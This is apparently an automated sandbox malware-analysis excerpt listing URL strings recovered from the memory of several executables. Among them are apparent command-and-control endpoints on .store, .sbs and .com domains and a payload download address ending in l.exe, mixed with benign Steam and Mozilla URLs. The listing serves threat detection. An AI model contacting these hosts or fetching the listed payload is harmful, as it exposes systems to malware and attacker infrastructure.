Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=oaWa21XUbd8h&am
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4Lb
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3090918742.0000000005CAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/8
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/apiv
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store/
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store/N
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store/api
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store/apiA
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store:443/api
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/
Source: skotes.exe, 00000017.00000003.2782531663.000000000155B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000003.2773430604.0000000001557000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/cgi-sys/suspendedpage.cgi
Source: skotes.exe, 00000017.00000003.2773430604.0000000001557000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exe
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exe1S=2Of
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exee
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exee9c09
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exee9c09317)
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exehpy
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exene
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exes1CALAP
Source: file1.exe, 00000018.00000003.2861364210.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2853326516.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813789486.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2852926387.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2753737498.0000000001356000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883648757.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2818198727.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2753913116.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813748659.000000000136F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/
Source: file1.exe, 00000018.00000002.2881058680.00000000012E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/#
Source: file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/)
Source: file1.exe, 00000018.00000003.2767540588.000000000135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/22
Source: file1.exe, 00000018.00000003.2852926387.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883648757.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797891117.0000000001378000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797500848.0000000001374000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2861521129.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.0000000001378000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.0000000001377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/7
Source: file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/Cy
Source: file1.exe, 00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/I
Source: file1.exe, 00000018.00000003.2852926387.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2753737498.0000000001356000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2783238474.000000000135D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883648757.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773960825.000000000135F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2767540588.000000000135D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813748659.000000000136F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/api
Source: file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813748659.000000000136F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/api7
Source: file1.exe, 00000018.00000003.2784335486.0000000001354000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2783238474.000000000135D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2818198727.000000000136B000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2785238032.000000000135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/api9)
Source: file1.exe, 00000018.00000003.2852926387.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/apiF
Source: file1.exe, 00000018.00000002.2881058680.000000000128E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/n
Source: file1.exe, 00000018.00000003.2797370105.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs:443/apiMicrosoft
Source: file1.exe, 00000018.00000002.2883648757.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2861521129.0000000001377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs:443/apifffla
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvI
Source: file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3090918742.0000000005CAC000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 4136f86ac7.exe, 00000025.00000003.3091077119.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095179623.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3093531602.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096193571.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096841796.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095820288.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowe
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 4136f86ac7.exe, 00000025.00000003.3119814255.000000000157B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/(
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/PAO
Source: 4136f86ac7.exe, 00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/S
Source: 4136f86ac7.exe, 0000001E.00000003.2903431989.0000000005606000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993268690.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2959514495.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2903502679.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2943712175.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2889137104.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918876574.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993587822.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2877411735.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B23000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.000000000150F000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096193571.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3097797490.000000000156E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3119814255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3098474106.0000000001573000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/api
